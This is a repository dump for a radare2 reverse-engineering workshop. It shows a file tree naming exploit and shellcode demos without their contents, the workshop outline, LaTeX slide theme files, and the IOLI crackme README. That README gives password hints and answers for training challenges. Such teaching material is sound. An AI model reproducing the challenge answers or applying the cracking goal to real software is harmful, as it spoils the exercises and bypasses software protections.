├── .gitignore ├── IOLI-crackme ├── 2015_FLAREOn_Challenges.zip ├── README.txt ├── bin-linux │ ├── crackme0x00 │ ├── crackme0x01 │ ├── crackme0x02 │ ├── crackme0x03 │ ├── crackme0x04 │ ├── crackme0x05 │ ├── crackme0x06 │ ├── crackme0x07 │ ├── crackme0x08 │ └── crackme0x09 ├── bin-pocketPC │ ├── crackme0x00.arm.exe │ ├── crackme0x01.arm.exe │ ├── crackme0x02.arm.exe │ ├── crackme0x03.arm.exe │ ├── crackme0x04.arm.exe │ ├── crackme0x05.arm.exe │ ├── crackme0x06.arm.exe │ ├── crackme0x07.arm.exe │ ├── crackme0x08.arm.exe │ └── crackme0x09.arm.exe └── bin-win32 │ ├── crackme0x00.exe │ ├── crackme0x01.exe │ ├── crackme0x02.exe │ ├── crackme0x03.exe │ ├── crackme0x04.exe │ ├── crackme0x05.exe │ ├── crackme0x06.exe │ ├── crackme0x07.exe │ ├── crackme0x08.exe │ └── crackme0x09.exe ├── Makefile ├── README.md ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerinnerthememetropolis.sty ├── beamerouterthememetropolis.sty ├── beamerthemem.sty ├── ccicons.sty ├── demos ├── Exploit │ ├── commands.md │ ├── pwn1 │ │ ├── exploit.py │ │ ├── pwn1 │ │ └── pwn1.c │ ├── pwn2 │ │ ├── exploit.py │ │ ├── pwn2 │ │ ├── pwn2.c │ │ └── you │ └── ropasaurus │ │ ├── exploit1.py │ │ ├── exploit2.py │ │ ├── exploit3.py │ │ ├── notes.md │ │ ├── original │ │ ├── patched │ │ └── readgot.py ├── Firmware │ ├── demo1_arm_boot │ │ ├── .gdb_history │ │ ├── connect_r2.sh │ │ ├── cortex_A8.idc │ │ ├── idc2r.py │ │ ├── mbmloader-1.raw │ │ ├── motorola-crypto.py │ │ ├── omap3430.idc │ │ ├── omap3430_boot.r2 │ │ ├── omap3430_boot_rom.idc │ │ ├── omap3430_boot_rom.r2 │ │ ├── omap3430_boot_rom_14.57.idb │ │ ├── omap3430_boot_rom_14.57.idc │ │ ├── omap3430_boot_rom_14.57.lst │ │ ├── omap3430_boot_rom_14.57.r2 │ │ ├── omap3430_boot_rom_14.57_2.r2 │ │ ├── omap3430_boot_rom_14.57_allinfo.idc │ │ ├── omap_3430.bin │ │ ├── run_qemu.sh │ │ └── run_r2.sh │ ├── demo3_x86_legacy │ │ ├── asrock_p4i65g.bin │ │ ├── asrock_p4i65g.h │ │ └── asrock_p4i65g.r2 │ ├── demo3_x86_uefi │ │ ├── 
Asus_937_12sec_dmienbg64.efi │ │ ├── CpuPei.efi │ │ ├── NTFS.efi │ │ ├── PchInit.pe │ │ ├── PchMeUma.efi │ │ ├── S3Restore.efi │ │ ├── SomeUefiFile.bin │ │ ├── efiguids.py │ │ ├── example.te │ │ ├── hp_image.bin │ │ ├── hp_image_2.bin │ │ └── search_guids.py │ └── demo5_it8502e │ │ ├── ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf │ │ ├── idc2r.py │ │ ├── ite_it8502.asm │ │ ├── ite_it8502.lst │ │ ├── ite_it8502.r2 │ │ ├── ite_it8502.rom │ │ ├── ite_it8502_from_ida.r2 │ │ ├── ite_it8502e.idb │ │ ├── ite_it8502e.idc │ │ └── run_r2.sh └── others │ └── pfvdemo ├── drawstack.sty ├── nocd ├── AoE.zip ├── Makefile ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerthemem.sty ├── pix │ ├── aoe.jpg │ ├── crack.png │ ├── ii.png │ ├── script.png │ └── x230.png ├── slides.pdf └── slides.tex ├── pe_certificate ├── pgfplotsthemetol.sty ├── pix ├── GOT.png ├── binsh.png ├── bruijn.png ├── code.png ├── crimages │ ├── bin-info.png │ ├── bof1.png │ ├── peda_context.png │ ├── poppopret.png │ ├── r2_context1.png │ └── shellcode.png ├── diff.png ├── exploit_pwn1.png ├── exploit_pwn2.png ├── got.png ├── libc.png ├── overflow1.png ├── overflow2.png ├── overflow3.png ├── plt_after.png ├── plt_before.png ├── ppp.png ├── pppr.png ├── pwn1_shellcode.png ├── pwn2.png ├── r2-nativedebug.png ├── radiff2.png ├── regstacklisting.png ├── rop.png ├── rop_pwn1.png ├── segfault_pwn1.png ├── socat.png ├── system_offset.png ├── web.png ├── writable.png └── you.png ├── pwns ├── bof │ └── bof │ │ ├── bof │ │ ├── bof.c │ │ ├── bof.rr2 │ │ ├── pattern.txt │ │ ├── profile │ │ ├── pwn.rb │ │ ├── shoe.rb │ │ └── slide.txt ├── magic │ ├── demo.c │ ├── pwn.rb │ └── shoe.rb ├── rop │ ├── pwn.rb │ ├── ropasaurusrex │ └── shoe.rb └── shellcode │ ├── binsh.elf │ └── binsh.r ├── refs.bib ├── shikata_ga_nai ├── Makefile ├── beamercolorthememetropolis.sty ├── beamerfontthememetropolis.sty ├── beamerinnerthememetropolis.sty ├── beamerouterthememetropolis.sty ├── beamerthemem.sty ├── 
execve.shellcode ├── hello.py ├── pix │ ├── description.png │ ├── esil.png │ ├── fpu.png │ ├── fpus.png │ ├── r2pipe.png │ └── solution.png ├── shellcode.shikata_ga_nai ├── shikataganai.py ├── slides.pdf ├── slides.tex └── test_fpu.py ├── slides.pdf └── slides.tex /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io 2 | 3 | ### LaTeX ### 4 | *.acn 5 | *.acr 6 | *.alg 7 | *.aux 8 | *.bbl 9 | *.bcf 10 | *.blg 11 | *.dvi 12 | *.fdb_latexmk 13 | *.glg 14 | *.glo 15 | *.gls 16 | *.idx 17 | *.ilg 18 | *.ind 19 | *.ist 20 | *.lof 21 | *.log 22 | *.lot 23 | *.maf 24 | *.mtc 25 | *.mtc0 26 | *.nav 27 | *.nlo 28 | *.out 29 | *.pdfsync 30 | *.ps 31 | *.run.xml 32 | *.snm 33 | *.synctex.gz 34 | *.toc 35 | *.vrb 36 | *.xdy 37 | *.tdo 38 | 39 | ### Vim ### 40 | *.swp 41 | *.un~ 42 | 43 | -------------------------------------------------------------------------------- /IOLI-crackme/2015_FLAREOn_Challenges.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/2015_FLAREOn_Challenges.zip -------------------------------------------------------------------------------- /IOLI-crackme/README.txt: -------------------------------------------------------------------------------- 1 | ======================= IOLI CRACKME v1.2 by pof ======================= 2 | 3 | [Goal] 4 | Crack the executable files to accept any password 5 | 6 | 7 | [Hints] 8 | Level 0x00: strings is your friend 9 | Level 0x01: 5274 10 | Level 0x02: ((10*9)+(123*4))^2 11 | Level 0x03: same password as in level 0x02 12 | Level 0x04: 9+6=15 - try 69 13 | Level 0x05: 9+7=16 but one is not enough - try 970 14 | Level 0x06: same algorithm as in 5, but envp LOLO=1 15 | Level 0x07: if you find this level too difficult, try the next 16 | one and then come back 17 | Level 0x08: same algorithm as in 0x06 18 | 19 | 20 
| [Tools] 21 | strings 22 | Displays printable strings in files 23 | included in all linux distributions 24 | http://sources.redhat.com/binutils/ 25 | 26 | HT Editor 27 | File editor/viewer/analyzer for executables. 28 | sudo apt-get install ht 29 | http://hte.sourceforge.net/ 30 | 31 | radare 32 | Complete toolchain for working with binary files 33 | http://radare.nopcode.org/ 34 | 35 | IDA Pro 36 | Interactive multi-processor disassembler and debugger 37 | http://www.datarescue.com/idabase/ 38 | 39 | ======================================================================== 40 | [EOF] 41 | -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x00 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x01 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x02 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x03: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x03 --------------------------------------------------------------------------------
/IOLI-crackme/bin-linux/crackme0x04: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x04 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x05: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x05 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x06: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x06 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x07: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x07 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x08: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x08 -------------------------------------------------------------------------------- /IOLI-crackme/bin-linux/crackme0x09: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-linux/crackme0x09 -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x00.arm.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x00.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x01.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x01.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x02.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x02.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x03.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x03.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x04.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x04.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x05.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x05.arm.exe 
-------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x06.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x06.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x07.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x07.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x08.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x08.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-pocketPC/crackme0x09.arm.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-pocketPC/crackme0x09.arm.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x00.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x00.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x01.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x01.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x02.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x02.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x03.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x03.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x04.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x04.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x05.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x05.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x06.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x06.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x07.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x07.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x08.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x08.exe -------------------------------------------------------------------------------- /IOLI-crackme/bin-win32/crackme0x09.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/IOLI-crackme/bin-win32/crackme0x09.exe -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: slides 2 | 3 | slides: slides.tex 4 | xelatex slides.tex 5 | xelatex $< -o slides.pdf 6 | rm -f *.aux *.snm *.toc *.log *.nax *.out 7 | #evince slides.pdf 8 | 9 | slides-bib: slides.tex 10 | pdflatex slides.tex 11 | biber slides 12 | pdflatex $< -o slides.pdf 13 | rm -f *.aux *.snm *.toc *.log *.naz *.out 14 | 15 | clean: 16 | rm -f *.aux *.snm *.toc *.log *.nax *.out *.nav 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Workshop2015 2 | 3 | TOC 4 | 5 | Part 0. Intro to the radare world (45 min + 15 min practice) 6 | ================================= 7 | 8 | 0.0 - Generalities on the radare2 framework 9 | 1.1 - Utility toolsuite 10 | 2.1 - Radare2 - Generalities 11 | 2.2 - Radare2 - Printing 12 | 2.3 - Radare2 - Info Commands 13 | 2.4 - Radare2 - Search 14 | 2.5 - Analysis 15 | 2.6 - Visual Mode(s) 16 | 2.7 - Student Practices - IOLI Set - Questions/Answers 17 | 18 | Part I.
Static analysis (1 hour 30 minutes) 19 | ======================= 20 | 21 | Chapter 1. Malware (45 minutes) 22 | ------------------ 23 | 1.1 Windows malware example 24 | 1.2 Linux malware example 25 | 26 | Chapter 2. Firmware (45 minutes) 27 | ------------------- 28 | 2.1. General MIPS router firmware unpacking (15 minutes) 29 | Showing low-hanging vulnerabilities in a classic SOHO router. 30 | 31 | 2.2 General ARM firmware analysis - bootloaders and android 32 | executables (15 minutes) 33 | - Texas Instruments bootrom analysis 34 | - Qualcomm TrustZone analysis 35 | - One of the Android executables 36 | 37 | 2.3 HDD firmware analysis (15 minutes) 38 | - Seagate firmware unpacking and disassembling 39 | 40 | Chapter 3. Practice (30 minutes) 41 | ------------------- 42 | 43 | Part II Debugging - (40 minutes) 44 | ================= 45 | 46 | Chapter 1. General techniques (30 minutes) 47 | ----------------------------- 48 | 1.1 gdb (10 minutes) 49 | Since the current native debugger is not perfect (it will be the focus 50 | for the next release), 51 | Radare2 can use gdb as a backend to debug processes. 52 | 53 | 1.2 native (10 minutes) 54 | We'll show a basic on-host debugging case, when you are brave enough 55 | to debug an executable (or even malware) directly on your machine. 56 | Also: 57 | - rarun2 - setup execution environment for a program (chroot, 58 | parameters, env, etc.) 59 | - remote r2 debugging r2 -c=h && r2 -C http://.../cmd/ 60 | 61 | 1.3 WinDbg and PDB (10 minutes) 62 | An essential part of Windows debugging is loading PDB files, 63 | especially for Windows drivers. 64 | 65 | Chapter 2. Firmware (10 minutes) 66 | ------------------- 67 | 2.1 qemu (10 minutes) 68 | Using embedded gdbserver to debug x86 bootloader/bios/uefi, 69 | and arm bootloader (see Part II, 2.2 section) 70 | 71 | Part III Scripting (1 hour) 72 | ================== 73 | 74 | Chapter 1.
Radare2 script (15 minutes) 75 | ------------------------- 76 | Basic scripting, pipelining radare2 commands, without any external plugins. 77 | Using python plugins, high-level analysis using python bindings 78 | 79 | Chapter 2. Scripting with r2pipe (30 minutes) 80 | -------------------------------- 81 | Using r2pipe for scripting with python, javascript. 82 | 83 | Chapter 3. Python bindings (15 minutes) 84 | -------------------------- 85 | Using 'classic' and 'ctypes' python bindings for the radare2 library 86 | 87 | Part IV ESIL (1 hour) 88 | ============ 89 | 90 | ESIL is an Evaluable String Intermediate Language 91 | 92 | Chapter 1. Small ESIL introduction 93 | ---------------------------------- 94 | ESIL syntax, opcodes, sources of the ESIL analysis 95 | 96 | Chapter 2. ESIL emulation 97 | ------------------------- 98 | Using ESIL for emulation, without needing qemu/bochs/vbox 99 | 100 | Chapter 3. ESIL to REIL conversion 101 | ---------------------------------- 102 | To be able to use already existing tools based on REIL 103 | 104 | THE END 105 | -------------------------------------------------------------------------------- /beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamercolorthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamercolorthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss.
15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamercolorthememetropolis}[2015/06/12 Metropolis color theme] 21 | \RequirePackage{pgfopts} 22 | \pgfkeys{ 23 | /metropolis/color/block/.cd, 24 | .is choice, 25 | transparent/.code=\@metropolis@block@transparent, 26 | fill/.code=\@metropolis@block@fill, 27 | } 28 | \pgfkeys{ 29 | /metropolis/color/background/.cd, 30 | .is choice, 31 | dark/.code=\@metropolis@colors@dark, 32 | light/.code=\@metropolis@colors@light, 33 | } 34 | \newcommand{\@metropolis@color@setdefaults}{ 35 | \pgfkeys{/metropolis/color/.cd, 36 | background=light, 37 | block=transparent, 38 | } 39 | } 40 | \definecolor{mDarkBrown}{HTML}{604c38} 41 | \definecolor{mDarkTeal}{HTML}{23373b} 42 | \definecolor{mLightBrown}{HTML}{EB811B} 43 | \definecolor{mLightGreen}{HTML}{14B03D} 44 | \newcommand{\@metropolis@colors@dark}{ 45 | \setbeamercolor{normal text}{% 46 | fg=black!2, 47 | bg=mDarkTeal 48 | } 49 | } 50 | \newcommand{\@metropolis@colors@light}{ 51 | \setbeamercolor{normal text}{% 52 | fg=mDarkTeal, 53 | bg=black!2 54 | } 55 | } 56 | \setbeamercolor{alerted text}{% 57 | fg=mLightBrown 58 | } 59 | \setbeamercolor{example text}{% 60 | fg=mLightGreen 61 | } 62 | \setbeamercolor{titlelike}{use=normal text, parent=normal text} 63 | \setbeamercolor{author}{use=normal text, parent=normal text} 64 | \setbeamercolor{date}{use=normal text, parent=normal text} 65 | \setbeamercolor{institute}{use=normal text, parent=normal text} 66 | \setbeamercolor{structure}{use=normal text, fg=normal text.fg} 67 | \setbeamercolor{palette primary}{% 68 | use=normal text, 69 | fg=normal text.bg, 70 | bg=normal text.fg 71 | } 72 | \setbeamercolor{frametitle}{% 73 | use=palette primary, 74 | parent=palette primary 75 | } 76 | 
\setbeamercolor{progress bar}{% 77 | use=alerted text, 78 | fg=alerted text.fg, 79 | bg=normal text.bg!50!normal text.fg 80 | } 81 | \setbeamercolor{title separator}{ 82 | use=progress bar, 83 | parent=progress bar 84 | } 85 | \setbeamercolor{progress bar in head/foot}{% 86 | use=progress bar, 87 | parent=progress bar 88 | } 89 | \setbeamercolor{progress bar in section page}{ 90 | use=progress bar, 91 | parent=progress bar 92 | } 93 | \newcommand{\@metropolis@block@transparent}{ 94 | \setbeamercolor{block title}{use=normal text, parent=normal text} 95 | } 96 | \newcommand{\@metropolis@block@fill}{ 97 | \setbeamercolor{block title}{% 98 | use=normal text, 99 | fg=normal text.fg, 100 | bg=normal text.bg!80!fg 101 | } 102 | } 103 | \setbeamercolor{block title alerted}{% 104 | use={block title, alerted text}, 105 | bg=block title.bg, 106 | fg=alerted text.fg 107 | } 108 | \setbeamercolor{block title example}{% 109 | use={block title, example text}, 110 | bg=block title.bg, 111 | fg=example text.fg 112 | } 113 | \setbeamercolor{block body alerted}{use=block body, parent=block body} 114 | \setbeamercolor{block body example}{use=block body, parent=block body} 115 | \setbeamercolor{block body}{ 116 | use={block title, normal text}, 117 | bg=block title.bg!50!normal text.bg 118 | } 119 | \setbeamercolor{footnote}{fg=normal text.fg!90} 120 | \setbeamercolor{footnote mark}{fg=.} 121 | \@metropolis@color@setdefaults 122 | \ProcessPgfPackageOptions{/metropolis/color} 123 | \mode 124 | \endinput 125 | %% 126 | %% End of file `beamercolorthememetropolis.sty'. 127 | -------------------------------------------------------------------------------- /beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerfontthememetropolis.sty', 3 | %% generated with the docstrip utility. 
4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerfontthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerfontthememetropolis}[2015/06/12 Metropolis font theme] 21 | \RequirePackage[no-math]{fontspec} 22 | \defaultfontfeatures{Mapping=tex-text} 23 | \setsansfont[BoldItalicFont={Fira Sans Italic},% 24 | ItalicFont={Fira Sans Light Italic},% 25 | BoldFont={Fira Sans}]{Fira Sans Light} 26 | \setmonofont{Fira Mono} 27 | \newfontfamily\ExtraLight{Fira Sans ExtraLight} 28 | \newfontfamily\Light{Fira Sans Light} 29 | \newfontfamily\Book{Fira Sans} 30 | \newfontfamily\Medium{Fira Sans Medium} 31 | \AtBeginEnvironment{tabular}{% 32 | \setsansfont[BoldFont={Fira Sans},% 33 | Numbers={Monospaced}]{Fira Sans Light}% 34 | } 35 | \setbeamerfont{title}{family=\Book, size=\Large, shape=\scshape} 36 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 37 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 38 | \setbeamerfont{section title}{family=\Book, size=\Large, shape=\scshape} 39 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 40 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 41 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 42 | \setbeamerfont{frametitle}{family=\Book, size=\large, shape=\scshape} 43 | \setbeamerfont{caption}{size=\small} 44 | 
\setbeamerfont{caption name}{family=\Book} 45 | \setbeamerfont{description item}{family=\Book} 46 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 47 | \setbeamerfont{bibliography entry author}{family=\Light, size=\normalsize} 48 | \setbeamerfont{bibliography entry title}{family=\Book, size=\normalsize} 49 | \setbeamerfont{bibliography entry location}{family=\Light, size=\normalsize} 50 | \setbeamerfont{bibliography entry note}{family=\Light, size=\small} 51 | \linespread{1.15} 52 | 53 | \endinput 54 | %% 55 | %% End of file `beamerfontthememetropolis.sty'. 56 | -------------------------------------------------------------------------------- /beamerinnerthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerinnerthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerinnerthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 
18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerinnerthememetropolis}[2015/06/12 Metropolis inner theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \RequirePackage{tikz} 25 | \pgfkeys{ 26 | /metropolis/inner/block/.cd, 27 | .is choice, 28 | transparent/.code=\setlength{\@metropolis@blockskip}{0ex}, 29 | fill/.code=\setlength{\@metropolis@blockskip}{1ex}, 30 | } 31 | \pgfkeys{ 32 | /metropolis/inner/titleformat/.cd, 33 | .is choice, 34 | regular/.code=\renewcommand{\@metropolis@titleformat}{}, 35 | lowercase/.code={% 36 | \renewcommand{\@metropolis@titleformat}{\MakeLowercase} 37 | }, 38 | uppercase/.code={% 39 | \renewcommand{\@metropolis@titleformat}{\MakeUppercase} 40 | }, 41 | } 42 | \pgfkeys{ 43 | /metropolis/inner/sectiontitleformat/.cd, 44 | .is choice, 45 | regular/.code=\renewcommand{\@metropolis@sectiontitleformat}{}, 46 | lowercase/.code={% 47 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeLowercase} 48 | }, 49 | uppercase/.code={% 50 | \renewcommand{\@metropolis@sectiontitleformat}{\MakeUppercase} 51 | }, 52 | } 53 | \pgfkeys{ 54 | /metropolis/inner/sectionpage/.cd, 55 | .is choice, 56 | none/.code=\@metropolis@sectionpage@none, 57 | progressbar/.code=\@metropolis@sectionpage@progressbar, 58 | } 59 | \newcommand{\@metropolis@inner@setdefaults}{ 60 | \pgfkeys{/metropolis/inner/.cd, 61 | sectionpage=progressbar, 62 | block=transparent, 63 | titleformat=lowercase, 64 | sectiontitleformat=lowercase, 65 | } 66 | } 67 | \def\@metropolis@titleformat#1{#1} 68 | \def\@metropolis@sectiontitleformat#1{#1} 69 | \patchcmd{\sectionentry} 70 | {\def\insertsectionhead{#2}} 71 | {\def\insertsectionhead{\@metropolis@sectiontitleformat{#2}}} 72 | {} 73 | {\PackageError{beamerinnerthememetropolis}{Patching section title failed.}} 74 | \patchcmd{\beamer@section} 75 | 
